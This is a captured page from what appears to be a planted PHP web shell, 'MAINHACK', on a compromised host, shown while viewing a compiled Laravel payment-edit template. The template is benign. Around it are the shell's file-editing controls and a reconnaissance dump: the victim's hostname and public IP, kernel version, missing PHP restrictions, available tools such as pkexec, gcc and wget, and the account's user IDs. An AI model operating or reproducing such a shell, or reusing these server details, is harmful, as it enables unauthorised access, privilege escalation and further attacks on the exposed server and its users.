[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: 3166d5f31cd0a8a88151dca79b17b2a4.php
<?php $__env->startSection('content'); ?> <div class="row"> <div class="col-lg-8 offset-lg-2"> <div class="card"> <div class="card-header"> <span class="panel-title"><?php echo e(_lang('Update Offline Payment')); ?></span> </div> <div class="card-body"> <form method="post" class="validate" autocomplete="off" action="<?php echo e(route('subscription_payments.update', $id)); ?>" enctype="multipart/form-data"> <?php echo csrf_field(); ?> <input name="_method" type="hidden" value="PATCH"> <div class="row"> <div class="col-lg-12"> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('User')); ?></label> <div class="col-xl-9"> <input type="text" class="form-control" name="user_id" value="<?php echo e($subscriptionpayment->user->name); ?>" readonly> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Payment Method')); ?></label> <div class="col-xl-9"> <input type="text" class="form-control" name="payment_method" value="<?php echo e($subscriptionpayment->payment_method); ?>" readonly> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Order / Transaction ID')); ?></label> <div class="col-xl-9"> <input type="text" class="form-control" name="order_id" value="<?php echo e($subscriptionpayment->order_id); ?>" readonly> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Package')); ?></label> <div class="col-xl-9"> <select class="form-control auto-select select2" data-selected="<?php echo e($subscriptionpayment->package_id); ?>" name="package_id" required> <option value=""><?php echo e(_lang('Select One')); ?></option> <?php $__currentLoopData = \App\Models\Package::active()->get(); $__env->addLoop($__currentLoopData); foreach($__currentLoopData as $package): $__env->incrementLoopIndices(); $loop = $__env->getLastLoop(); ?> <option value="<?php echo e($package->id); ?>"><?php echo e($package->name); ?> (<?php echo e(decimalPlace($package->cost, currency_symbol()).'/'.ucwords($package->package_type)); ?>)</option> <?php endforeach; $__env->popLoop(); $loop = $__env->getLastLoop(); ?> </select> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Amount')); ?> (<?php echo e(currency_symbol()); ?>)</label> <div class="col-xl-9"> <input type="text" class="form-control float-field" name="amount" value="<?php echo e($subscriptionpayment->amount); ?>" required> </div> </div> <div class="form-group row"> <label class="col-xl-3 col-form-label"><?php echo e(_lang('Status')); ?></label> <div class="col-xl-9"> <select class="form-control auto-select" data-selected="<?php echo e($subscriptionpayment->status); ?>" name="status" required> <option value="0"><?php echo e(_lang('Pending')); ?></option> <option value="1"><?php echo e(_lang('Completed')); ?></option> <option value="2"><?php echo e(_lang('Hold')); ?></option> <option value="3"><?php echo e(_lang('Refund')); ?></option> <option value="4"><?php echo e(_lang('Cancelled')); ?></option> </select> </div> </div> <div class="form-group row mt-2"> <div class="col-xl-9 offset-xl-3"> <button type="submit" class="btn btn-primary"><i class="ti-check-box mr-2"></i><?php echo e(_lang('Submit')); ?></button> </div> </div> </div> </div> </form> </div> </div> </div> </div> <?php $__env->stopSection(); ?> <?php echo $__env->make('layouts.app', \Illuminate\Support\Arr::except(get_defined_vars(), ['__data', '__path']))->render(); ?><?php /**PATH /home/eliosofonline/acc.eliosof.com/resources/views/backend/admin/subscription_payment/edit.blade.php ENDPATH**/ ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.97 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002